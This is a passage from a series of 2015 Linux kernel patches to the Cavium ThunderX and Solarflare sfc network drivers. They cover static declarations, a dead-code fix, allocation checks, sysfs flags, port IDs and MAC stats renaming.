a58924cd47ed..83476f04aa42 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -38,7 +38,7 @@ struct lmac { bool is_sgmii; struct delayed_work dwork; struct workqueue_struct *check_link; -} lmac; +}; struct bgx { u8 bgx_id; @@ -50,7 +50,7 @@ struct bgx { int use_training; void __iomem *reg_base; struct pci_dev *pdev; -} bgx; +}; struct bgx *bgx_vnic[MAX_BGX_THUNDER]; static int lmac_count; /* Total no of LMACs in system */ From fd7ec06254b174b1a8170cca66ec35fea299b151 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:23 -0700 Subject: [PATCH 595/872] net: thunderx: add static This fixes sparse messages like this: drivers/net/ethernet/cavium/thunder/nicvf_main.c:1141:26: sparse: symbol 'nicvf_get_stats64' was not declared. Should it be static? Also remove unused declarations Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 2 -- .../net/ethernet/cavium/thunder/nicvf_main.c | 28 ++++++++----------- .../ethernet/cavium/thunder/nicvf_queues.c | 2 +- .../net/ethernet/cavium/thunder/thunder_bgx.c | 6 ++-- 4 files changed, 16 insertions(+), 22 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 6479ce21f64c..a3b43e50a576 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -413,10 +413,8 @@ int nicvf_set_real_num_queues(struct net_device *netdev, int nicvf_open(struct net_device *netdev); int nicvf_stop(struct net_device *netdev); int nicvf_send_msg_to_pf(struct nicvf *vf, union nic_mbx *mbx); -void nicvf_config_cpi(struct nicvf *nic); void nicvf_config_rss(struct nicvf *nic); void nicvf_set_rss_key(struct nicvf *nic); -void nicvf_free_skb(struct nicvf *nic, struct sk_buff *skb); void nicvf_set_ethtool_ops(struct net_device *netdev); void nicvf_update_stats(struct nicvf *nic); void nicvf_update_lmac_stats(struct nicvf *nic); diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index 54bba86c9534..02da802d3288 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -50,10 +50,6 @@ module_param(cpi_alg, int, S_IRUGO); MODULE_PARM_DESC(cpi_alg, "PFC algorithm (0=none, 1=VLAN, 2=VLAN16, 3=IP Diffserv)"); -static int nicvf_enable_msix(struct nicvf *nic); -static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev); -static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx); - static inline void nicvf_set_rx_frame_cnt(struct nicvf *nic, struct sk_buff *skb) { @@ -174,6 +170,14 @@ static int nicvf_check_pf_ready(struct nicvf *nic) return 1; } +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) +{ + if (bgx->rx) + nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; + else + nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; +} + static void nicvf_handle_mbx_intr(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -255,7 +259,7 @@ static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) return nicvf_send_msg_to_pf(nic, &mbx); } -void nicvf_config_cpi(struct nicvf *nic) +static void nicvf_config_cpi(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -267,7 +271,7 @@ void nicvf_config_cpi(struct nicvf *nic) nicvf_send_msg_to_pf(nic, &mbx); } -void nicvf_get_rss_size(struct nicvf *nic) +static void nicvf_get_rss_size(struct nicvf *nic) { union nic_mbx mbx = {}; @@ -575,7 +579,7 @@ static int nicvf_poll(struct napi_struct *napi, int budget) * * As of now only CQ errors are handled */ -void nicvf_handle_qs_err(unsigned long data) +static void nicvf_handle_qs_err(unsigned long data) { struct nicvf *nic = (struct nicvf *)data; struct queue_set *qs = nic->qs; @@ -1043,14 +1047,6 @@ static int nicvf_set_mac_address(struct net_device *netdev, void *p) return 0; } -static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) -{ - if (bgx->rx) - nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; - else - nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; -} - void nicvf_update_lmac_stats(struct nicvf *nic) { int stat = 0; @@ -1141,7 +1137,7 @@ void nicvf_update_stats(struct nicvf *nic) nicvf_update_sq_stats(nic, qidx); } -struct rtnl_link_stats64 *nicvf_get_stats64(struct net_device *netdev, +static struct rtnl_link_stats64 *nicvf_get_stats64(struct net_device *netdev, struct rtnl_link_stats64 *stats) { struct nicvf *nic = netdev_priv(netdev); diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 196246665444..7f0e108445cc 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -228,7 +228,7 @@ static void nicvf_free_rbdr(struct nicvf *nic, struct rbdr *rbdr) /* Refill receive buffer descriptors with new buffers. */ -void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) +static void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) { struct queue_set *qs = nic->qs; int rbdr_idx = qs->rbdr_cnt; diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index 83476f04aa42..633ec05dfe05 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -52,7 +52,7 @@ struct bgx { struct pci_dev *pdev; }; -struct bgx *bgx_vnic[MAX_BGX_THUNDER]; +static struct bgx *bgx_vnic[MAX_BGX_THUNDER]; static int lmac_count; /* Total no of LMACs in system */ static int bgx_xaui_check_link(struct lmac *lmac); @@ -253,7 +253,7 @@ static void bgx_sgmii_change_link_state(struct lmac *lmac) bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); } -void bgx_lmac_handler(struct net_device *netdev) +static void bgx_lmac_handler(struct net_device *netdev) { struct lmac *lmac = container_of(netdev, struct lmac, netdev); struct phy_device *phydev = lmac->phydev; @@ -655,7 +655,7 @@ static int bgx_lmac_enable(struct bgx *bgx, u8 lmacid) return 0; } -void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) +static void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) { struct lmac *lmac; u64 cmrx_cfg; From 89987844681757f68dd16b96c4d1d0cc1039183c Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:24 -0700 Subject: [PATCH 596/872] net: thunderx: fix nicvf_set_rxfh() This fixes a copypaste bug that was discovered by a static analysis tool: The patch 4863dea3fab0: "net: Adding support for Cavium ThunderX network controller" from May 26, 2015, leads to the following static checker warning: drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c:517 nicvf_set_rxfh() warn: we tested 'hkey' before and it was 'false' drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c 506 /* We do not allow change in unsupported parameters */ 507 if (hkey || ^^^^ We return here. 508 (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) 509 return -EOPNOTSUPP; 510 511 rss->enable = true; 512 if (indir) { 513 for (idx = 0; idx < rss->rss_size; idx++) 514 rss->ind_tbl[idx] = indir[idx]; 515 } 516 517 if (hkey) { ^^^^ So this is dead code. 518 memcpy(rss->key, hkey, RSS_HASH_KEY_SIZE * sizeof(u64)); 519 nicvf_set_rss_key(nic); 520 } 521 522 nicvf_config_rss(nic); 523 return 0; 524 } regards, dan carpenter Reported-by: Dan Carpenter Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c index 0fc4a536afc9..16bd2d772db9 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c @@ -504,8 +504,7 @@ static int nicvf_set_rxfh(struct net_device *dev, const u32 *indir, } /* We do not allow change in unsupported parameters */ - if (hkey || - (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) + if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP) return -EOPNOTSUPP; rss->enable = true; From 39a0dd0b5e21ce93212a1dd026abb227c92e7651 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:25 -0700 Subject: [PATCH 597/872] net: thunderx: remove unneeded type conversions No need to cast void* to u8*: pointer arithmetics works same way for both. Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 7f0e108445cc..8929029613ca 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -62,8 +62,7 @@ static int nicvf_alloc_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem, /* Align memory address for 'align_bytes' */ dmem->phys_base = NICVF_ALIGNED_ADDR((u64)dmem->dma, align_bytes); - dmem->base = (void *)((u8 *)dmem->unalign_base + - (dmem->phys_base - dmem->dma)); + dmem->base = dmem->unalign_base + (dmem->phys_base - dmem->dma); return 0; } From fa1a6c93afbf774d87c04f03e30cf55dc1128906 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:26 -0700 Subject: [PATCH 598/872] net: thunderx: check if memory allocation was successful This fixes a coccinelle warning: coccinelle warnings: (new ones prefixed by >>) >> drivers/net/ethernet/cavium/thunder/nicvf_queues.c:360:1-11: alloc >> with no test, possible model on line 367 vim +360 drivers/net/ethernet/cavium/thunder/nicvf_queues.c 354 err = nicvf_alloc_q_desc_mem(nic, &sq->dmem, q_len, SND_QUEUE_DESC_SIZE, 355 NICVF_SQ_BASE_ALIGN_BYTES); 356 if (err) 357 return err; 358 359 sq->desc = sq->dmem.base; > 360 sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); 361 sq->head = 0; 362 sq->tail = 0; 363 atomic_set(&sq->free_cnt, q_len - 1); 364 sq->thresh = SND_QUEUE_THRESH; 365 366 /* Preallocate memory for TSO segment's header */ > 367 sq->tso_hdrs = dma_alloc_coherent(&nic->pdev->dev, 368 q_len * TSO_HEADER_SIZE, 369 &sq->tso_hdrs_phys, GFP_KERNEL); 370 if (!sq->tso_hdrs) Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 8929029613ca..2ed7d1b7f7e8 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -357,6 +357,8 @@ static int nicvf_init_snd_queue(struct nicvf *nic, sq->desc = sq->dmem.base; sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + if (!sq->skbuff) + return -ENOMEM; sq->head = 0; sq->tail = 0; atomic_set(&sq->free_cnt, q_len - 1); From 86ace693bb5ba54015e88bb637452d2d84f446a4 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:27 -0700 Subject: [PATCH 599/872] net: thunderx: use GFP_KERNEL in thread context GFP_KERNEL should be used in the thread context Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_queues.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c index 2ed7d1b7f7e8..d69d228d11a0 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -356,7 +356,7 @@ static int nicvf_init_snd_queue(struct nicvf *nic, return err; sq->desc = sq->dmem.base; - sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_KERNEL); if (!sq->skbuff) return -ENOMEM; sq->head = 0; From 8be41320f346ee8bdcbbc866fcc8c4fdbcb6527d Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:25 +0100 Subject: [PATCH 600/872] sfc: Add code to export port_num in netdev->dev_port In the case where we have multiple functions (PFs and VFs), this sysfs entry is useful to identify the physical port corresponding to the function we are interested in. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 4eb6ab748f06..06605abbe7c9 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -249,6 +249,7 @@ static int efx_ef10_get_mac_address_vf(struct efx_nic *efx, u8 *mac_address) static int efx_ef10_probe(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data; + struct net_device *net_dev = efx->net_dev; int i, rc; /* We can have one VI for each 8K region. However, until we @@ -329,6 +330,7 @@ static int efx_ef10_probe(struct efx_nic *efx) if (rc < 0) goto fail3; efx->port_num = rc; + net_dev->dev_port = rc; rc = efx->type->get_mac_address(efx, efx->net_dev->perm_addr); if (rc) From c9012e002b643790eb0311744cdf13e489397327 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:41 +0100 Subject: [PATCH 601/872] sfc: Add paranthesis correctly on all branches of the if statement This change is a stylistic change and does not affect functionality. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 06605abbe7c9..14c5205200da 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -346,9 +346,9 @@ static int efx_ef10_probe(struct efx_nic *efx) * ask if it's already enabled */ rc = efx_mcdi_set_workaround(efx, MC_CMD_WORKAROUND_BUG35388, true); - if (rc == 0) + if (rc == 0) { nic_data->workaround_35388 = true; - else if (rc == -EPERM) { + } else if (rc == -EPERM) { unsigned int enabled; rc = efx_mcdi_get_workarounds(efx, NULL, &enabled); @@ -356,9 +356,9 @@ static int efx_ef10_probe(struct efx_nic *efx) goto fail3; nic_data->workaround_35388 = enabled & MC_CMD_GET_WORKAROUNDS_OUT_BUG35388; - } - else if (rc != -ENOSYS && rc != -ENOENT) + } else if (rc != -ENOSYS && rc != -ENOENT) { goto fail3; + } netif_dbg(efx, probe, efx->net_dev, "workaround for bug 35388 is %sabled\n", nic_data->workaround_35388 ? "en" : "dis"); From 0f5c0845882745bc5fde9dbbf553926435efe887 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:37:58 +0100 Subject: [PATCH 602/872] sfc: Add sysfs entry for flags (link control and primary) On every adapter there will be one primary PF per adaptor and one link control PF per port. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 58 +++++++++++++++++++++++++++++---- 1 file changed, 51 insertions(+), 7 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 14c5205200da..e659da818c6c 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -246,6 +246,34 @@ static int efx_ef10_get_mac_address_vf(struct efx_nic *efx, u8 *mac_address) return 0; } +static ssize_t efx_ef10_show_link_control_flag(struct device *dev, + struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + + return sprintf(buf, "%d\n", + ((efx->mcdi->fn_flags) & + (1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_LINKCTRL)) + ? 1 : 0); +} + +static ssize_t efx_ef10_show_primary_flag(struct device *dev, + struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + + return sprintf(buf, "%d\n", + ((efx->mcdi->fn_flags) & + (1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_PRIMARY)) + ? 1 : 0); +} + +static DEVICE_ATTR(link_control_flag, 0444, efx_ef10_show_link_control_flag, + NULL); +static DEVICE_ATTR(primary_flag, 0444, efx_ef10_show_primary_flag, NULL); + static int efx_ef10_probe(struct efx_nic *efx) { struct efx_ef10_nic_data *nic_data; @@ -315,30 +343,39 @@ static int efx_ef10_probe(struct efx_nic *efx) if (rc) goto fail3; - rc = efx_ef10_get_pf_index(efx); + rc = device_create_file(&efx->pci_dev->dev, + &dev_attr_link_control_flag); if (rc) goto fail3; + rc = device_create_file(&efx->pci_dev->dev, &dev_attr_primary_flag); + if (rc) + goto fail4; + + rc = efx_ef10_get_pf_index(efx); + if (rc) + goto fail5; + rc = efx_ef10_init_datapath_caps(efx); if (rc < 0) - goto fail3; + goto fail5; efx->rx_packet_len_offset = ES_DZ_RX_PREFIX_PKTLEN_OFST - ES_DZ_RX_PREFIX_SIZE; rc = efx_mcdi_port_get_number(efx); if (rc < 0) - goto fail3; + goto fail5; efx->port_num = rc; net_dev->dev_port = rc; rc = efx->type->get_mac_address(efx, efx->net_dev->perm_addr); if (rc) - goto fail3; + goto fail5; rc = efx_ef10_get_sysclk_freq(efx); if (rc < 0) - goto fail3; + goto fail5; efx->timer_quantum_ns = 1536000 / rc; /* 1536 cycles */ /* Check whether firmware supports bug 35388 workaround. @@ -357,7 +394,7 @@ static int efx_ef10_probe(struct efx_nic *efx) nic_data->workaround_35388 = enabled & MC_CMD_GET_WORKAROUNDS_OUT_BUG35388; } else if (rc != -ENOSYS && rc != -ENOENT) { - goto fail3; + goto fail5; } netif_dbg(efx, probe, efx->net_dev, "workaround for bug 35388 is %sabled\n", @@ -365,12 +402,16 @@ static int efx_ef10_probe(struct efx_nic *efx) rc = efx_mcdi_mon_probe(efx); if (rc && rc != -EPERM) - goto fail3; + goto fail5; efx_ptp_probe(efx, NULL); return 0; +fail5: + device_remove_file(&efx->pci_dev->dev, &dev_attr_primary_flag); +fail4: + device_remove_file(&efx->pci_dev->dev, &dev_attr_link_control_flag); fail3: efx_mcdi_fini(efx); fail2: @@ -613,6 +654,9 @@ static void efx_ef10_remove(struct efx_nic *efx) if (!nic_data->must_restore_piobufs) efx_ef10_free_piobufs(efx); + device_remove_file(&efx->pci_dev->dev, &dev_attr_primary_flag); + device_remove_file(&efx->pci_dev->dev, &dev_attr_link_control_flag); + efx_mcdi_fini(efx); efx_nic_free_buffer(efx, &nic_data->mcdi_buf); kfree(nic_data); From 1d051e009851334899e2041c3d8dcde36e2db1c2 Mon Sep 17 00:00:00 2001 From: Shradha Shah Date: Tue, 2 Jun 2015 11:38:16 +0100 Subject: [PATCH 603/872] sfc: Implement ndo_gets_phys_port_id() for EF10 VFs Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 11 +++++++++++ drivers/net/ethernet/sfc/ef10_sriov.c | 14 ++++++++++++++ drivers/net/ethernet/sfc/ef10_sriov.h | 3 +++ drivers/net/ethernet/sfc/efx.c | 1 + drivers/net/ethernet/sfc/net_driver.h | 2 ++ drivers/net/ethernet/sfc/nic.h | 1 + drivers/net/ethernet/sfc/sriov.c | 11 +++++++++++ drivers/net/ethernet/sfc/sriov.h | 2 ++ 8 files changed, 45 insertions(+) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index e659da818c6c..22c5dc3ba43b 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -406,6 +406,16 @@ static int efx_ef10_probe(struct efx_nic *efx) efx_ptp_probe(efx, NULL); +#ifdef CONFIG_SFC_SRIOV + if ((efx->pci_dev->physfn) && (!efx->pci_dev->is_physfn)) { + struct pci_dev *pci_dev_pf = efx->pci_dev->physfn; + struct efx_nic *efx_pf = pci_get_drvdata(pci_dev_pf); + + efx_pf->type->get_mac_address(efx_pf, nic_data->port_id); + } else +#endif + ether_addr_copy(nic_data->port_id, efx->net_dev->perm_addr); + return 0; fail5: @@ -4140,6 +4150,7 @@ const struct efx_nic_type efx_hunt_a0_vf_nic_type = { .vswitching_probe = efx_ef10_vswitching_probe_vf, .vswitching_restore = efx_ef10_vswitching_restore_vf, .vswitching_remove = efx_ef10_vswitching_remove_vf, + .sriov_get_phys_port_id = efx_ef10_sriov_get_phys_port_id, #endif .get_mac_address = efx_ef10_get_mac_address_vf, .set_mac_address = efx_ef10_set_mac_address, diff --git a/drivers/net/ethernet/sfc/ef10_sriov.c b/drivers/net/ethernet/sfc/ef10_sriov.c index 3969b1bf7ef3..cd524543c363 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.c +++ b/drivers/net/ethernet/sfc/ef10_sriov.c @@ -736,3 +736,17 @@ int efx_ef10_sriov_get_vf_config(struct efx_nic *efx, int vf_i, return 0; } + +int efx_ef10_sriov_get_phys_port_id(struct efx_nic *efx, + struct netdev_phys_item_id *ppid) +{ + struct efx_ef10_nic_data *nic_data = efx->nic_data; + + if (!is_valid_ether_addr(nic_data->port_id)) + return -EOPNOTSUPP; + + ppid->id_len = ETH_ALEN; + memcpy(ppid->id, nic_data->port_id, ppid->id_len); + + return 0; +} diff --git a/drivers/net/ethernet/sfc/ef10_sriov.h b/drivers/net/ethernet/sfc/ef10_sriov.h index b98557670f73..ffc92a504c3f 100644 --- a/drivers/net/ethernet/sfc/ef10_sriov.h +++ b/drivers/net/ethernet/sfc/ef10_sriov.h @@ -54,6 +54,9 @@ int efx_ef10_sriov_get_vf_config(struct efx_nic *efx, int vf_i, int efx_ef10_sriov_set_vf_link_state(struct efx_nic *efx, int vf_i, int link_state); +int efx_ef10_sriov_get_phys_port_id(struct efx_nic *efx, + struct netdev_phys_item_id *ppid); + int efx_ef10_vswitching_probe_pf(struct efx_nic *efx); int efx_ef10_vswitching_probe_vf(struct efx_nic *efx); int efx_ef10_vswitching_restore_pf(struct efx_nic *efx); diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 2d4853c032c3..de16cec7ec61 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2282,6 +2282,7 @@ static const struct net_device_ops efx_netdev_ops = { .ndo_set_vf_spoofchk = efx_sriov_set_vf_spoofchk, .ndo_get_vf_config = efx_sriov_get_vf_config, .ndo_set_vf_link_state = efx_sriov_set_vf_link_state, + .ndo_get_phys_port_id = efx_sriov_get_phys_port_id, #endif #ifdef CONFIG_NET_POLL_CONTROLLER .ndo_poll_controller = efx_netpoll, diff --git a/drivers/net/ethernet/sfc/net_driver.h b/drivers/net/ethernet/sfc/net_driver.h index a468a22e7a88..d72f522bf9c3 100644 --- a/drivers/net/ethernet/sfc/net_driver.h +++ b/drivers/net/ethernet/sfc/net_driver.h @@ -1350,6 +1350,8 @@ struct efx_nic_type { struct ifla_vf_info *ivi); int (*sriov_set_vf_link_state)(struct efx_nic *efx, int vf_i, int link_state); + int (*sriov_get_phys_port_id)(struct efx_nic *efx, + struct netdev_phys_item_id *ppid); int (*vswitching_probe)(struct efx_nic *efx); int (*vswitching_restore)(struct efx_nic *efx); void (*vswitching_remove)(struct efx_nic *efx); diff --git a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index db8562ec586d..e146e30780a1 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -524,6 +524,7 @@ struct efx_ef10_nic_data { unsigned int vport_id; bool must_probe_vswitching; unsigned int pf_index; + u8 port_id[ETH_ALEN]; #ifdef CONFIG_SFC_SRIOV unsigned int vf_index; struct ef10_vf *vf; diff --git a/drivers/net/ethernet/sfc/sriov.c b/drivers/net/ethernet/sfc/sriov.c index 6c5edbdbfa27..816c44689e67 100644 --- a/drivers/net/ethernet/sfc/sriov.c +++ b/drivers/net/ethernet/sfc/sriov.c @@ -70,3 +70,14 @@ int efx_sriov_set_vf_link_state(struct net_device *net_dev, int vf_i, else return -EOPNOTSUPP; } + +int efx_sriov_get_phys_port_id(struct net_device *net_dev, + struct netdev_phys_item_id *ppid) +{ + struct efx_nic *efx = netdev_priv(net_dev); + + if (efx->type->sriov_get_phys_port_id) + return efx->type->sriov_get_phys_port_id(efx, ppid); + else + return -EOPNOTSUPP; +} diff --git a/drivers/net/ethernet/sfc/sriov.h b/drivers/net/ethernet/sfc/sriov.h index 3be15a54c562..400df526586d 100644 --- a/drivers/net/ethernet/sfc/sriov.h +++ b/drivers/net/ethernet/sfc/sriov.h @@ -23,6 +23,8 @@ int efx_sriov_get_vf_config(struct net_device *net_dev, int vf_i, struct ifla_vf_info *ivi); int efx_sriov_set_vf_link_state(struct net_device *net_dev, int vf_i, int link_state); +int efx_sriov_get_phys_port_id(struct net_device *net_dev, + struct netdev_phys_item_id *ppid); #endif /* CONFIG_SFC_SRIOV */ From e80ca0139929a37a8d2b7fc90625aa5107066f57 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:38:34 +0100 Subject: [PATCH 604/872] sfc: add "port_" prefix to MAC stats The MAC stats are per-port and will only be displayed on the PF with control of the link (one per physical port). Vadapter stats will also be displayed for this PF, so distinguish the MAC stats by adding a prefix of "port_". Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 251 ++++++++++++++------------- drivers/net/ethernet/sfc/mcdi_pcol.h | 4 +- drivers/net/ethernet/sfc/nic.h | 106 +++++------ 3 files changed, 182 insertions(+), 179 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index 22c5dc3ba43b..f44a56a68f3a 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -991,93 +991,94 @@ static int efx_ef10_reset(struct efx_nic *efx, enum reset_type reset_type) [GENERIC_STAT_ ## ext_name] = { #ext_name, 0, 0 } static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { - EF10_DMA_STAT(tx_bytes, TX_BYTES), - EF10_DMA_STAT(tx_packets, TX_PKTS), - EF10_DMA_STAT(tx_pause, TX_PAUSE_PKTS), - EF10_DMA_STAT(tx_control, TX_CONTROL_PKTS), - EF10_DMA_STAT(tx_unicast, TX_UNICAST_PKTS), - EF10_DMA_STAT(tx_multicast, TX_MULTICAST_PKTS), - EF10_DMA_STAT(tx_broadcast, TX_BROADCAST_PKTS), - EF10_DMA_STAT(tx_lt64, TX_LT64_PKTS), - EF10_DMA_STAT(tx_64, TX_64_PKTS), - EF10_DMA_STAT(tx_65_to_127, TX_65_TO_127_PKTS), - EF10_DMA_STAT(tx_128_to_255, TX_128_TO_255_PKTS), - EF10_DMA_STAT(tx_256_to_511, TX_256_TO_511_PKTS), - EF10_DMA_STAT(tx_512_to_1023, TX_512_TO_1023_PKTS), - EF10_DMA_STAT(tx_1024_to_15xx, TX_1024_TO_15XX_PKTS), - EF10_DMA_STAT(tx_15xx_to_jumbo, TX_15XX_TO_JUMBO_PKTS), - EF10_DMA_STAT(rx_bytes, RX_BYTES), - EF10_DMA_INVIS_STAT(rx_bytes_minus_good_bytes, RX_BAD_BYTES), - EF10_OTHER_STAT(rx_good_bytes), - EF10_OTHER_STAT(rx_bad_bytes), - EF10_DMA_STAT(rx_packets, RX_PKTS), - EF10_DMA_STAT(rx_good, RX_GOOD_PKTS), - EF10_DMA_STAT(rx_bad, RX_BAD_FCS_PKTS), - EF10_DMA_STAT(rx_pause, RX_PAUSE_PKTS), - EF10_DMA_STAT(rx_control, RX_CONTROL_PKTS), - EF10_DMA_STAT(rx_unicast, RX_UNICAST_PKTS), - EF10_DMA_STAT(rx_multicast, RX_MULTICAST_PKTS), - EF10_DMA_STAT(rx_broadcast, RX_BROADCAST_PKTS), - EF10_DMA_STAT(rx_lt64, RX_UNDERSIZE_PKTS), - EF10_DMA_STAT(rx_64, RX_64_PKTS), - EF10_DMA_STAT(rx_65_to_127, RX_65_TO_127_PKTS), - EF10_DMA_STAT(rx_128_to_255, RX_128_TO_255_PKTS), - EF10_DMA_STAT(rx_256_to_511, RX_256_TO_511_PKTS), - EF10_DMA_STAT(rx_512_to_1023, RX_512_TO_1023_PKTS), - EF10_DMA_STAT(rx_1024_to_15xx, RX_1024_TO_15XX_PKTS), - 